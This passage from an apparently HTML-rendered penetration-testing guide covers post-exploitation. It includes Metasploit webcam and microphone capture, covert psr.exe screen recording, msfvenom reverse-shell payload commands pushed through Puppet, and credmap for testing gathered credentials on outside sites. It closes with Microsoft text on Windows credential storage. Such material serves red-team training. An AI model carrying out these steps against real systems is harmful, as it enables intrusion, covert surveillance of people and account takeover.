<p>Metasploit provides post-exploitation modules for taking snapshots from a webcam and recording sound from a microphone. Imagine the impact of informing the client that we can watch a person’s live feed or record sound from a meeting room without being present in it. Perhaps the meeting discussed passwords, company secrets, operations, future plans, spending, etc.</p>
<div class="section" id="webcam">
<h4>Webcam<a class="headerlink" href="#webcam" title="Permalink to this headline">¶</a></h4>
<p>This module allows the user to detect installed webcams (with the LIST action) or take a snapshot (with the SNAPSHOT action).</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>msf > use post/windows/manage/webcam
msf post(webcam) > info
Name: Windows Manage Webcam
Module: post/windows/manage/webcam
Available actions:
Name Description
---- -----------
LIST Show a list of webcams
SNAPSHOT Take a snapshot with the webcam
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
INDEX 1 no The index of the webcam to use
QUALITY 50 no The JPEG image quality
SESSION yes The session to run this module on.
</pre></div>
</div>
</div>
<div class="section" id="record-mic">
<h4>Record_Mic<a class="headerlink" href="#record-mic" title="Permalink to this headline">¶</a></h4>
<p>This module will enable and record your target’s microphone.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>msf post(webcam) > use post/multi/manage/record_mic
msf post(record_mic) > info
Name: Multi Manage Record Microphone
Module: post/multi/manage/record_mic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DURATION 5 no Number of seconds to record
SESSION yes The session to run this module on.
</pre></div>
</div>
<p>Sinn3r has written a blog post, <a class="reference external" href="https://community.rapid7.com/community/metasploit/blog/2013/01/23/the-forgotten-spying-feature-metasploits-mic-recording-command">The forgotten spying feature: Metasploit’s Mic Recording Command</a>, which provides more information. Once we have recorded the meetings, the WAV sound files can be converted to text using a speech-to-text API.</p>
</div>
<div class="section" id="user-activity">
<h4>User Activity<a class="headerlink" href="#user-activity" title="Permalink to this headline">¶</a></h4>
<p>If we have a Meterpreter session on a Windows machine, we can use Problem Steps Recorder (PSR), a Microsoft built-in tool, to capture screenshots and text descriptions of what a user is doing on their system.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>psr.exe [/start |/stop][/output <fullfilepath>] [/sc (0|1)] [/maxsc <value>]
[/sketch (0|1)] [/slides (0|1)] [/gui (0|1)]
[/arcetl (0|1)] [/arcxml (0|1)] [/arcmht (0|1)]
[/stopevent <eventname>] [/maxlogsize <value>] [/recordpid <pid>]
/start Start Recording. (Outputpath flag SHOULD be specified)
/stop Stop Recording.
/sc Capture screenshots for recorded steps.
/maxsc Maximum number of recent screen captures.
/maxlogsize Maximum log file size (in MB) before wrapping occurs.
/gui Display control GUI.
/arcetl Include raw ETW file in archive output.
/arcxml Include MHT file in archive output.
/recordpid Record all actions associated with given PID.
/sketch Sketch UI if no screenshot was saved.
/slides Create slide show HTML pages.
/output Store output of record session in given path.
/stopevent Event to signal after output files are generated.
</pre></div>
</div>
<p>Once we have a Meterpreter session, we can execute it from a shell (the snippet below uses PowerShell’s Start-Sleep to wait between starting and stopping the recording):</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>psr.exe /start /gui 0 /output C:\Users\Dan\Desktop\cool.zip;
Start-Sleep -s 20;
psr.exe /stop;
</pre></div>
</div>
<p>Refer to <a class="reference external" href="https://cyberarms.wordpress.com/2016/02/13/using-problem-steps-recorder-psr-remotely-with-metasploit/">Using Problem Steps Recorder (PSR) Remotely with Metasploit</a></p>
</div>
</div>
<div class="section" id="hypervisor">
<h3>Hypervisor<a class="headerlink" href="#hypervisor" title="Permalink to this headline">¶</a></h3>
<p>A hypervisor or virtual machine monitor (VMM) is computer software, firmware or hardware that creates and runs virtual machines. Many times we find that the client has deployed a common 4-tier architecture such as development, testing, staging, production (DEV, TEST, STAGING, PROD) on hypervisors, i.e. each environment on one hypervisor. If you compromise the hypervisor (mostly joined to the Windows domain), you end up compromising the whole (DEV/ TEST/ STAGING and PROD) environment. We once compromised a client’s SAP environment in this manner.</p>
</div>
<div class="section" id="targeted-hunting">
<h3>Targeted Hunting<a class="headerlink" href="#targeted-hunting" title="Permalink to this headline">¶</a></h3>
<p>As we already have domain administrator privileges, we own the network and possibly have access to every machine. However, we will cover a non-traditional way to strategically target and compromise computers.</p>
<div class="section" id="microsofts-system-center-configuration-manager">
<h4>Microsoft’s System Center Configuration Manager<a class="headerlink" href="#microsofts-system-center-configuration-manager" title="Permalink to this headline">¶</a></h4>
<p>SCCM is a platform that allows for an enterprise to package and deploy operating systems, software, and software updates. It allows for IT staff to script and push out installations to clients in an automated manner. If you can gain access to SCCM, it makes for a great attack platform. It heavily integrates Windows PowerShell, has excellent network visibility, and has a number of SCCM clients as SYSTEM just waiting to execute your code as SYSTEM.</p>
<p>Enigma has written an awesome blog post, <a class="reference external" href="https://enigma0x3.net/2015/10/27/targeted-workstation-compromise-with-sccm/">Targeted workstation compromise with SCCM</a></p>
</div>
<div class="section" id="microsoft-system-center-operations-manager">
<h4>Microsoft System Center Operations Manager<a class="headerlink" href="#microsoft-system-center-operations-manager" title="Permalink to this headline">¶</a></h4>
<p>System Center Operations Manager (SCOM) is a cross-platform data center monitoring system for operating systems and hypervisors. It uses a single interface that shows state, health and performance information of computer systems. It also provides alerts generated according to some availability, performance, configuration or security situation being identified. It works with Microsoft Windows Server and Unix-based hosts.</p>
<p>SCOM also allows monitoring the health of a system, provides a PowerShell interface to the machine, and provides the ability to execute a script on a particular machine.</p>
</div>
<div class="section" id="puppet">
<h4>Puppet<a class="headerlink" href="#puppet" title="Permalink to this headline">¶</a></h4>
<p>Puppet is an open-source software configuration management tool. It runs on many Unix-like systems as well as on Microsoft Windows. It was created to easily automate repetitive and error-prone system administration tasks. Puppet’s easy-to-read declarative language allows you to declare how your systems should be configured to do their jobs.</p>
<p>However, if an organization is using Puppet to control its servers/ workstations and we have compromised the Puppet server, we can simply create a Metasploit Meterpreter payload for the target operating system (Windows/ Linux) using msfvenom.</p>
<ul class="simple">
<li>Linux</li>
</ul>
<blockquote>
<div><div class="highlight-None notranslate"><div class="highlight"><pre><span></span>msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
</pre></div>
</div>
</div></blockquote>
<ul class="simple">
<li>Windows</li>
</ul>
<blockquote>
<div><div class="highlight-None notranslate"><div class="highlight"><pre><span></span>msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
</pre></div>
</div>
</div></blockquote>
<ul class="simple">
<li>Mac</li>
</ul>
<blockquote>
<div><div class="highlight-None notranslate"><div class="highlight"><pre><span></span>msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
</pre></div>
</div>
</div></blockquote>
<p>Create a module in Puppet that includes this payload using a file resource and stores it on the targeted machine. Using an exec resource, execute the payload and we would receive the Meterpreter on the listener.</p>
<p>Tanoy Bose has written the blog on <a class="reference external" href="http://n0tty.github.io/2017/06/11/Enterprise-Offense-IT-Operations-Part-1/">Enterprise Offense: IT Operations [Part 1] - Post-Exploitation of Puppet and Ansible Servers</a></p>
<div class="admonition-todo admonition" id="index-0">
<p class="first admonition-title">Todo</p>
<ul class="last simple">
<li>Email/ mailbox post-exploitation; also check whether someone has already exploited this (check logs), which is also connected to the domain?</li>
<li>How does google email works?</li>
<li>File Hunting – Better ways!! Faster ways!!</li>
</ul>
</div>
</div>
<div class="section" id="credmap-the-credential-mapper">
<h4>Credmap: The credential Mapper<a class="headerlink" href="#credmap-the-credential-mapper" title="Permalink to this headline">¶</a></h4>
<p><a class="reference external" href="https://github.com/lightos/credmap">credmap</a> is an open-source tool created by <a class="reference external" href="https://github.com/lightos">Roberto Salgado</a> to check for credential reuse. It tests the supplied username/email and password against a list of well-known websites and reports where the pair logs in successfully, which makes it useful for checking whether credentials gathered during an engagement are also valid on other sites. Note that it does so by actually authenticating to third-party services with those credentials, so confirm that the rules of engagement cover this before running it.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>Usage: credmap.py --email EMAIL | --user USER | --load LIST [options]
Options:
-h/--help show this help message and exit
-v/--verbose display extra output information
-u/--username=USER.. set the username to test with
-p/--password=PASS.. set the password to test with
-e/--email=EMAIL set an email to test with
-l/--load=LOAD_FILE load list of credentials in format USER:PASSWORD
-f/--format=CRED_F.. format to use when reading from file (e.g. u|e:p)
-x/--exclude=EXCLUDE exclude sites from testing
-o/--only=ONLY test only listed sites
-s/--safe-urls only test sites that use HTTPS
-i/--ignore-proxy ignore system default HTTP proxy
--proxy set proxy (e.g. "socks5://192.168.1.2:9050")
--list list available sites to test with
--update update from the official git repository
Examples:
./credmap.py --username janedoe --email [email protected]
./credmap.py -u johndoe -e [email protected] --exclude "github.com, live.com"
./credmap.py -u johndoe -p abc123 -vvv --only "linkedin.com, facebook.com"
./credmap.py -e [email protected] --verbose --proxy "https://127.0.0.1:8080"
./credmap.py --load creds.txt --format "e.u.p"
./credmap.py -l creds.txt -f "u|e:p"
./credmap.py -l creds.txt
./credmap.py --list
</pre></div>
</div>
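<p>As an added example, not code from this page or from credmap itself, the block below parses the credential-list layout that credmap's <code class="docutils literal notranslate">--load</code> / <code class="docutils literal notranslate">--format</code> options describe and runs the one reuse check that needs no network at all: which passwords are already shared between identities inside the list. credmap names the fields with <code class="docutils literal notranslate">u</code>, <code class="docutils literal notranslate">e</code> and <code class="docutils literal notranslate">p</code> and marks an either-or field as <code class="docutils literal notranslate">u|e</code>; treating every other character of the spec as a literal separator, and classifying a <code class="docutils literal notranslate">u|e</code> value as an email when it contains <code class="docutils literal notranslate">@</code>, are assumptions made for this example, not credmap's documented grammar. The sample list is constructed.</p>

```python
"""Added example, not part of the page or of credmap: a parser for credmap-style
credential lists (the --load / --format options) and a local reuse check.

credmap's format spec names fields with u (username), e (email) and p (password);
"u|e" marks a field that may hold either. Treating every other character as a
literal separator, and classifying a "u|e" value by the presence of "@", are
assumptions made for this example, not credmap's documented grammar.
"""
from collections import defaultdict
from typing import Dict, List, NamedTuple, Optional, Tuple

FIELD_LETTERS = {"u", "e", "p"}


class Credential(NamedTuple):
    username: Optional[str]
    email: Optional[str]
    password: str

    @property
    def identity(self) -> str:
        """Label to report under: username if present, else the email."""
        return self.username or self.email or "<unknown>"


def tokenize_format(fmt: str) -> List[Tuple[str, str]]:
    """'u|e:p' -> [('field', 'u|e'), ('sep', ':'), ('field', 'p')]."""
    tokens: List[Tuple[str, str]] = []
    i = 0
    while i < len(fmt):
        ch = fmt[i]
        if ch in FIELD_LETTERS:
            field = ch
            while i + 2 < len(fmt) and fmt[i + 1] == "|" and fmt[i + 2] in FIELD_LETTERS:
                field += "|" + fmt[i + 2]          # absorb alternatives such as u|e
                i += 2
            tokens.append(("field", field))
        else:
            tokens.append(("sep", ch))
        i += 1
    if not tokens or tokens[-1] != ("field", "p"):
        raise ValueError("format must end with the password field p")
    return tokens


def parse_line(line: str, fmt: str = "u|e:p") -> Credential:
    """Split one line by fmt; the trailing password keeps any separators it contains."""
    tokens = tokenize_format(fmt)
    rest = line.rstrip("\r\n")
    username = email = None
    password = ""
    for idx, (kind, value) in enumerate(tokens):
        if kind == "sep":
            continue
        if idx + 1 == len(tokens):               # last field: take the remainder
            chunk, rest = rest, ""
        else:
            sep = tokens[idx + 1][1]
            if sep not in rest:
                raise ValueError(f"line does not match format {fmt!r}: {line!r}")
            chunk, rest = rest.split(sep, 1)     # caveat: '.' as a separator is ambiguous with email addresses
        if value == "p":
            password = chunk
        elif value == "u" or (value != "e" and "@" not in chunk):
            username = chunk                     # plain u, or u|e without an '@'
        else:
            email = chunk
    if not password:
        raise ValueError(f"empty password in line {line!r}")
    return Credential(username, email, password)


def load_credentials(text: str, fmt: str = "u|e:p") -> List[Credential]:
    """Parse a whole --load file, skipping blank lines and '#' comments."""
    return [parse_line(raw, fmt) for raw in text.splitlines()
            if raw.strip() and not raw.lstrip().startswith("#")]


def reused_passwords(creds: List[Credential]) -> Dict[str, List[str]]:
    """Passwords shared by several identities in the list itself: reuse you
    already know about, worth confirming before touching any third-party site."""
    by_password: Dict[str, List[str]] = defaultdict(list)
    for cred in creds:
        if cred.identity not in by_password[cred.password]:
            by_password[cred.password].append(cred.identity)
    return {pw: ids for pw, ids in by_password.items() if len(ids) > 1}


# Constructed sample list (not real accounts) in credmap's default u|e:p layout.
SAMPLE_CREDS = """\
# user-or-email:password
janedoe:Winter2024!
janedoe@example.com:Winter2024!
johndoe:abc123
svc_backup:Winter2024!
"""

if __name__ == "__main__":
    creds = load_credentials(SAMPLE_CREDS)
    for cred in creds:
        print(f"{cred.identity:22} email={cred.email} password={cred.password}")
    for pw, ids in reused_passwords(creds).items():
        print(f"reused {pw!r}: {', '.join(ids)}")
```

<p>The password field is always last and takes the remainder of the line, so passwords containing the separator survive; the reverse is not true for separators that can appear inside a username or email, which is why a format such as <code class="docutils literal notranslate">e.u.p</code> is inherently ambiguous and a colon or comma is the safer choice when you write the list yourself.</p>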
</div>
</div>
</div>
<div class="section" id="appendix-i-windows-credentials">
<span id="a1-windows-credentials"></span><h2>Appendix-I : Windows Credentials<a class="headerlink" href="#appendix-i-windows-credentials" title="Permalink to this headline">¶</a></h2>
<p>This section explains the concepts of authentication, credentials and authenticators, credential storage, authentication protocols, and logon types. The text below has been taken directly from Microsoft's <a class="reference external" href="https://www.microsoft.com/en-in/download/details.aspx?id=36036">Mitigating Pass-the-Hash (PtH) Attacks and Other Credential Theft, Versions 1 and 2</a>.</p>
<div class="section" id="terminology-authentication-credentials-and-authenticators">
<h3>Terminology: authentication, credentials, and authenticators<a class="headerlink" href="#terminology-authentication-credentials-and-authenticators" title="Permalink to this headline">¶</a></h3>
<p>When a user wants to access a computing resource, they must provide information that identifies who they are, their identity, and proof of this identity in the form of secret information that only they are supposed to know. This proof of identity is called an <strong>authenticator</strong>. An authenticator can take various forms, depending on the authentication protocol and method. The combination of an <strong>identity</strong> and an <strong>authenticator</strong> is called an <strong>authentication credential or credential</strong>. The process of creation, submission, and verification of credentials is described simply as <strong>authentication</strong>, which is implemented through various authentication protocols, such as NTLM and Kerberos authentication. Authentication establishes the identity of the user, but not necessarily the user’s permission to access or change a computing resource, which is handled by a separate authorization process.</p>
</div>
<div class="section" id="credentials-in-windows-operating-systems">
<h3>Credentials in Windows operating systems<a class="headerlink" href="#credentials-in-windows-operating-systems" title="Permalink to this headline">¶</a></h3>
<p>Credentials are typically created or converted to a form required by the authentication protocols available on a computer. Credentials may be stored in LSASS process memory for use by the account during a session. Credentials must also be stored on disk in authoritative databases, such as the SAM database and the Active Directory database.</p>
<div class="section" id="identities-usernames">
<h4>Identities - usernames<a class="headerlink" href="#identities-usernames" title="Permalink to this headline">¶</a></h4>
<p>In Windows operating systems, a user’s identity takes the form of the account’s username, either the “user name” (SAM Account Name) or the User Principal Name (UPN).</p>
</div>
<div class="section" id="windows-authenticators">
<h4>Windows authenticators<a class="headerlink" href="#windows-authenticators" title="Permalink to this headline">¶</a></h4>
<p>The table below, Windows Credential Types, lists the credential (authenticator) types in Windows operating systems and gives a brief description of each.</p>
<table border="1" class="docutils">
<colgroup>
<col width="16%" />
<col width="84%" />
</colgroup>
<thead valign="bottom">
<tr class="row-odd"><th class="head">Credential Type</th>
<th class="head">Description</th>
</tr>
</thead>
<tbody valign="top">
<tr class="row-even"><td>Plaintext credentials</td>
<td>When a user logs on to a Windows computer and provides a username and credentials, such as a password or PIN, the
information is provided to the computer in plaintext. This plaintext password is used to authenticate the user’s
identity by converting it into the form required by the authentication protocol. Current versions of Windows also
retain an encrypted copy of this password that can be decrypted back to plaintext for use with authentication methods
such as Digest authentication.</td>
</tr>
<tr class="row-odd"><td>NT hash</td>
<td>The NT hash of the password is calculated using an unsalted MD4 hash algorithm. MD4 is a cryptographic one-way
function that produces a mathematical representation of a password. This hashing function is designed to always
produce the same result from the same password input, and to minimize collisions where two different passwords can
produce the same result. This hash is always the same length and cannot be directly decrypted to reveal the plaintext
password. Because the NT hash only changes when the password changes, an NT hash is valid for authentication until a
user’s password is changed. This also means that if two accounts use an identical password, they will also have an
identical NT password hash.</td>
</tr>
<tr class="row-even"><td>LM Hash</td>
<td><p class="first">LAN Manager (LM) hashes are derived from the user password. Legacy support for LM hashes and the LAN Manager
authentication protocol remains in the Windows NTLM protocol suite, but default configurations and Microsoft security
guidance have discouraged their use for more than a decade. LM hashes have a number of challenges that make them less
secure and more valuable to attackers if stolen:</p>
<ul class="simple">
<li>LM hashes required a password to be less than 15 characters long and contain only ASCII characters.</li>
<li>LM hashes also do not differentiate between uppercase and lowercase letters.</li>
</ul>
<p class="last">Techniques to obtain the plaintext value from an LM hash with relatively low effort have been available for a number of
years, so the loss of an LM hash should be considered nearly equivalent to the loss of the plaintext password.</p>
</td>
</tr>
<tr class="row-odd"><td>Windows logon cached
password verifiers</td>
<td>These verifiers are stored in the registry (HKLM\Security) on the local computer and provide validation of a domain
user’s credentials when the computer cannot connect to Active Directory during a user logon. These are not
credentials, as they cannot be presented to another computer for authentication, and they can only be used to locally
verify a credential.</td>
</tr>
</tbody>
</table>
</div>
<div class="section" id="credential-storage">
<h4>Credential Storage<a class="headerlink" href="#credential-storage" title="Permalink to this headline">¶</a></h4>
<p>The table below, Credential Storage, lists the types of credential storage locations available on the Windows operating system.</p>
<table border="1" class="docutils">
<colgroup>
<col width="16%" />
<col width="84%" />
</colgroup>
<thead valign="bottom">
<tr class="row-odd"><th class="head">Credential sources</th>
<th class="head">Description</th>
</tr>
</thead>
<tbody valign="top">
<tr class="row-even"><td>Security Accounts
Manager (SAM)
database</td>
<td><p class="first">The SAM database is stored as a file on the local disk, and is the authoritative credential store for local accounts
on each Windows computer. This database contains all the credentials that are local to that specific computer
including the built-in local Administrator account and any other local accounts for that computer.</p>
<p class="last">The SAM database stores information on each account, including the username and the NT password hash. By default,
the SAM database does not store LM hashes on current versions of Windows. It is important to note that no password is
ever stored in a SAM database, only the password hashes.</p>
</td>
</tr>
<tr class="row-odd"><td>Local Security
Authority Subsystem
Service (LSASS)
process memory</td>
<td><p class="first">The Local Security Authority (LSA) stores credentials in memory on behalf of users with active Windows sessions. This
allows users to seamlessly access network resources, such as file shares, Exchange mailboxes, and SharePoint sites,
without reentering their credentials for each remote service. LSA may store credentials in multiple forms including:</p>
<ul class="simple">
<li>Reversibly encrypted plaintext</li>
<li>Kerberos tickets (TGTs, service tickets)</li>
<li>NT hash</li>
<li>LM hash</li>
</ul>
<p class="last">If the user logs on to Windows using a smartcard, LSA will not store a plaintext password, but it will store the
corresponding NT hash value for the account and the plaintext PIN for the smartcard.</p>
</td>
</tr>
<tr class="row-even"><td>LSA secrets on disk</td>
<td><p class="first">A Local Security Authority (LSA) secret is a secret piece of data that is accessible only to SYSTEM account processes.
Some of these secrets are credentials that must persist after reboot and are stored in encrypted form on disk.
Credentials stored as LSA secrets on disk may include:</p>
<ul class="simple">
<li>Account password for the computer’s Active Directory account.</li>
<li>Account passwords for Windows services configured on the computer.</li>
<li>Account passwords for configured scheduled tasks.</li>
<li>Account passwords for IIS application pools and websites.</li>
</ul>
<p class="last">An attack tool running as an account with administrative privileges on the computer can exploit those privileges to
extract these LSA secrets.</p>
</td>
</tr>
<tr class="row-odd"><td>Domain Active
Directory Database
( NTDS.DIT )</td>
<td><p class="first">The Active Directory database is the authoritative store of credentials for all user and computer accounts in an
Active Directory domain. Each writable domain controller in the domain contains a full copy of the domain’s Active
Directory database, including account credentials for all accounts in the domain. Read-only domain controllers (RODCs)
house a partial local replica with credentials for a selected subset of the accounts in the domain. By default, RODCs
do not have a copy of privileged domain accounts.</p>
<p>The Active Directory database stores a number of attributes for each account, including both username types and the
following:</p>
<ul class="last simple">
<li>NT hash for current password.</li>
<li>NT hashes for password history (if configured).</li>
</ul>
</td>
</tr>
<tr class="row-even"><td>Credential Manager
(CredMan) store</td>
<td>Users may choose to save passwords in Windows using an application or through the Credential Manager Control Panel
applet. These credentials are stored on disk and protected using the Data Protection Application Programming Interface
(DPAPI), which encrypts them with a key derived from the user’s password. Any program running as that user will be
able to access credentials in this store.</td>